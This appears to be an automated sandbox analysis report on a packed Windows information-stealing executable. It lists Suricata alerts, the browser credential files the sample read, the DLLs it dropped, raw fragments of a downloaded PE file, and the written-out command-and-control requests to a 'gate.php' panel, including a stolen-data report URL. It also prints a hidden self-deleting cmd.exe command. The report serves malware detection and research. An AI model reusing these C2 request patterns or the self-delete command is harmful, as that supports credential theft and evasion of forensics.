Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 22, 2021, 1:53 p.m.	July 22, 2021, 1:55 p.m.

Size	6.5MB
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5	`f07a2b61edd48c6d6c310cf9b7e4882e`
SHA256	`74fc2d5f6140f595c2002e50a82b9d2e5dc5050c25cd6963f87e9b61ac98e93b`
CRC32	`F42F4239`
ssdeep	`196608:DxbeGOzHs8RTmMlr7xuDVPYvw0l9uyQaWNAs0D27:J3OnRTrB9KWNLTfWNAHD27`
Yara	IsPE32 - (no description) VMProtect_Zero - VMProtect packed file PE_Header_Zero - PE File Signature

12.bin "C:\Users\test22\AppData\Local\Temp\12.bin"
2096
- cmd.exe "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin"
  2384
  - chcp.com chcp 65001
    2448
  - PING.EXE ping 127.0.0.1
    2492

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
134.209.203.126	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49162 -> 134.209.203.126:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 134.209.203.126:80 -> 192.168.56.102:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 134.209.203.126:80 -> 192.168.56.102:49162	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2022986	ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad	A Network Trojan was detected
TCP 192.168.56.102:49164 -> 134.209.203.126:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 134.209.203.126:80 -> 192.168.56.102:49164	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 22, 2021, 1:53 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 22, 2021, 1:53 p.m.			0	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 22, 2021, 1:53 p.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\12.bin console_handle: 0x00000007	1	1
WriteConsoleW July 22, 2021, 1:53 p.m.	buffer: Active code page: 65001 console_handle: 0x00000013	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: Pinging 127.0.0.1 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), console_handle: 0x00000007	1	1
WriteConsoleA July 22, 2021, 1:53 p.m.	buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms console_handle: 0x00000007	1	1

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 22, 2021, 1:53 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.vmp0
section	.vmp1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://134.209.203.126/hornycock/system/assets/bundle.bin
suspicious_features	Connection to IP address	suspicious_request	GET http://134.209.203.126/hornycock/gate.php?type=settings
suspicious_features	Connection to IP address	suspicious_request	GET http://134.209.203.126/hornycock/gate.php?type=ip
suspicious_features	Connection to IP address	suspicious_request	GET http://134.209.203.126/hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
suspicious_features	Connection to IP address	suspicious_request	GET http://134.209.203.126/hornycock/gate.php?type=loader&tag=traffer1

Performs some HTTP requests (5 events)

request	GET http://134.209.203.126/hornycock/system/assets/bundle.bin
request	GET http://134.209.203.126/hornycock/gate.php?type=settings
request	GET http://134.209.203.126/hornycock/gate.php?type=ip
request	GET http://134.209.203.126/hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
request	GET http://134.209.203.126/hornycock/gate.php?type=loader&tag=traffer1

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 22, 2021, 1:53 p.m.	process_identifier: 2096 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x032e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory July 22, 2021, 1:53 p.m.	process_identifier: 2096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x032e1000 process_handle: 0xffffffff	1	0	0

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW July 22, 2021, 1:53 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 12289376256 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1	0

Steals private information from local Internet browsers (50 out of 146 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Local Extension Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Cookies

Creates executable files on the filesystem (30 events)

file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\softokn3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-string-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\twain_32.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\msvcp140.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\nss3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\mozglue.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\zip.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-convert-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-synch-l1-2-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-multibyte-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-environment-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\freebl3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\vcruntime140.dll

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin"
cmdline	cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin"

Drops an executable to the user AppData folder (31 events)

file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\freebl3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\twain_32.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\softokn3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\nss3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-convert-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-environment-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-string-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\zip.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\mozglue.dll
file	C:\Users\test22\AppData\Local\Temp\12.bin
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-crt-multibyte-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\msvcp140.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\vcruntime140.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\Local\Temp\$Zip$EFmklD4LhjGbNrGu0yPG\api-ms-win-core-synch-l1-2-0.dll

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 22, 2021, 1:53 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin" filepath: cmd.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return
Process32NextW July 22, 2021, 1:53 p.m.	snapshot_handle: 0x00000324 process_name: mobsync.exe process_identifier: 1752	1	1
Process32NextW July 22, 2021, 1:53 p.m.	snapshot_handle: 0x00000324 process_name: pw.exe process_identifier: 1084	1	1
Process32NextW July 22, 2021, 1:53 p.m.	snapshot_handle: 0x00000324 process_name: taskhost.exe process_identifier: 1400	1	1
Process32NextW July 22, 2021, 1:53 p.m.	snapshot_handle: 0x00000324 process_name: SearchFilterHost.exe process_identifier: 1784	1	1
Process32NextW July 22, 2021, 1:53 p.m.	snapshot_handle: 0x00000324 process_name: 12.bin process_identifier: 2096	1	1

An executable file was downloaded by the process 12.bin (27 events)

Time & API	Arguments	Status	Return
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Áf=ßSSS\s¬S\sQSRichSPEL`âÅ`à!O0O@O.rsrcOO@@ ef(g@hXipjk l¸mÐnèopq0rHs`txuv¨wÀxØyðz{ \|8}P~h°ÈØèø(8HXhx¨¸ÈØèø(8HXhx Ø í( W¨lI°µO¸KÀOqÈÀgÐ' YØ _àß _è>QðIøØ¸°Þ¸shR5@C¨6(ëÐ=¸9 ºG¸·@rKGH¹KGPLQXQLI`LIhãLIp,MKxwMIÀMÝNKMZÿÿ¸@øº´ Í!¸LÍ!This program canno request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ; ;$;X;h;Ð<Ô<Ø<Ü<à<ä<è<ì<ð<ô<ø<ü<== =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>>>>>>> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>\|>>>>>>>>> >¤>¨>¬>°>´>¸>¼>À>Ä>È>Ì>Ð>Ô>Ø>Ü>à>ä>è>ì>ð>ô>ø>ü>???????? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?\|????????? ?¤?¨?¬?°?´?¸?¼?À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?ô?ø?ü?`00000000 0$0(0,0004080<0@0D0H0L0P0T0T3X3`34(444L4P4l4p444¬4°4Ì4Ð4ð45,505P5p55°5Ð5ð5606P6p66°6Ð6ð6707P7p77°7Ð7ð78,808 ìÐ1Ô1Ø1Ü17H7X7h7x77 7¬7°7´7Ð7Ô7888 8¤8¨8¬8°8´8¸8¼8È8Ì8Ð8Ô8Ø8Ü8à8ä8::H;L;P;T;X;\;`;d;h;l;p;t;x;\|;;;;; ;°;È;Ø;ð;<<(<@<P<h<x<< <¸<È<à<ð<==0=@=X=h===¨=¸=Ð=à=ø=> >0>X>p>t>x>>>¨>Ð>è>ì>ð>ø>? ?8?H?`?p???°?À?Ø?è?° 00(080P0`0x00 0°0È0Ø0ð011(1@1P1h1x11 1¸1È1à1ð12202@2X2h222¨2¸2Ð2à2ø23 303H3L3P3T3X3p3t3x3\|3333 3¤3¨3À3Ä3È3Ì3Ð3è3ì3ð3ô3ø34444 484<4@4D4H4X4`4p4444¨4°4À4è45(585P5`5x5\|555555555 5¤5¨5¬5°5´5¸5¼5È5Ð5à5ð5ø566 606@6H6X6h6p666¨6À6Ð6è6ø6`8d8h8l8p888888°8´8¸8¼8À8Ø8Ü8à8ä8è899999(9,9094989P9T9X9\9`9x9\|9999 9¤9¨9¬9°9È9Ì9Ð9Ô9Ø9ð9ô9ø9ü9::: :$:(:@:D:H:L:P:h:l:p:t:x::::: :¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:ì:ð:ô:ø:ü:;;;;$;(;0;4;<;@;H;T;X;`;d;l;p;x;\|;;;; ;¨;¬;´;¸;À;Ä;Ì;Ð;Ø;Ü;ä;è;ð;ô;ü;<<<<< <$<,<0<8<<<D<H<P<T<\<`<h<l<t<x<<<<<<¤<°<´<¼<À<È<Ì<Ô<Ø<à<ä<ì<ð<ø<ü<===== =(=,=4=8=@=D=L=P=X=\=d=h=p=t=\|====== =¤=¬=°=¸=¼=Ä=È=Ð=Ô=Ü=à=è=ô=ø=>>>>$>0><>H>T>`>d>l>p>x>\|>>>>¨>´>¸>Ð>à>ø>? ?0?8?@?H?P?h?p????? ?¤?¨?¬?°?´?¸?¼?À?Ä?È?Ì?Ð?Ô?MZÿÿ¸@º´ Í!¸LÍ!This program canno request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: Ø?ó?L<0E0N0W00¤0È0:1é1û1 2y2Ø233¡3À3ñ3C5}66®6Ä6Ì60:8;I;É=&>+>=>[>o>u> ,ò2a3r3334"4¾4Ò4ã45}5526x768m9°`L1\1`1d1h1l1x1\|11111 1¨1°1¸1À1È1Ð1Ø1à1è1ð1ø12222 2(20282@2H2P2X2`2h2p2x22222 2¨2°2¸2À2È2Ð2Ø2à2è2ð2ø23333 3(30383@3H3P3X3`3h3p3x33333 3¨3°3¸3À3È3Ð3Ø3à3è3ð3ø34444 4(40484@4H4P4X4`4h4p4x44444 4¨4°4¸4À4È4Ð4Ø4à4è4ð4ø45555@;D;H;À>È>Ð>Ô>Ø>Ü>à>ä>è>ì>ô>ø>ü>??????$?,?0?4?8?<?H?L?P?T?X?\?`?d?h?l?p?t?x?\|???????ÀÀx4\|444444444 4¤4¨4¬4°4´4¸4¼4À4Ä4È4Ì4Ð4Ô4Ø4Ü4à4ä4è4ì4ð4ô4ø4ü455555555 5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5\|555555555 5¤5¨5¬5°5´5¸5¼5À5Ä5È5Ì5Ð5Ô5Ø5¼9À9Ä9È9ÐÐ222$2,242<2D2L2T2\2d2l2t2\|22222¤2¬2´2¼2Ä2Ì2Ô2Ü2ä2ì2ô2ü23333$3,343<3D3L3T3\3d3l3t3\|33333¤3¬3´3¼3Ä3Ì3Ô3Ü3ä3ì3ô3ü34444$4,444<4D4L4T4\4d4l4t4\|44444¤4¬4´4¼4Ä4Ì4Ô4Ü4ä4ì4ô4ü45555$5,545<5D5L5T5\5d5l5t5\|55555¤5¬5´5¼5Ä5Ì5Ô5Ü5ä5ì5ô5ü56666$6,646<6D6L6T6\6d6l6t6\|66666¤6¬6´6¼6Ä6Ì6Ô6Ü6ä6ì6ô6ü67777$7,747<7D7L7T7\7d7l7t7\|77777¤7¬7´7¼7Ä7Ì7Ô7Ü7ä7ì7ô7ü78888$8,848<8D8L8T8\8d8l8t8\|88888¤8¬8´8¼8Ä8Ì8Ô8Ü8ä8ì8ô8ü89999$9àÐ0383@3H3P3X3`3h3p3x33333 3¨3°3¸3À3È3Ð3Ø3à3è3ð3ø34444 4(40484@4H4P4X4`4h4p4x44444 4¨4°4¸4À4È4Ð4Ø4à4è4ð4ø45555 5(50585@5H5P5X5`5h5p5x55555 5¨5°5¸5À5È5Ð5Ø5à5è5ð5ø56666 6(60686@6H6P6X6`6h6p6x66666 6¨6°6¸6À6È6Ð6Ø6à6è6ð6ø67777 7(70787@7H7P7X7`7h7p7x77777 7¨7°7¸7À7È7Ð7Ø7à7è7ð7ø78888 8(80888@8H8P8X8`8h8p8x88888 8¨8°8¸8À8È8Ð8Ø8à8è8ð8ø89999 9(90989@9H9P9X9`9h9p9x99999 9¨9°9¸9À9È9Ð9Ø9à9è9ð9ø9:::: :(:0:8:@:H:ðL:4>4B4F4L=T=\=d=l=t=\|=====¤=¬=´=¼=Ä=Ì=Ô=Ü=ä=ì=ô=ü=>>>>$>,>lL:P:X:; ;,;D;H;d;h;;;¨;È;è;<(<H<h<<¨<È<ä<è<=(=D=H=h==¨=È=è=>(>H>h>>¨>È>è>?(?H?h??¨?È?è?0(0H0h000 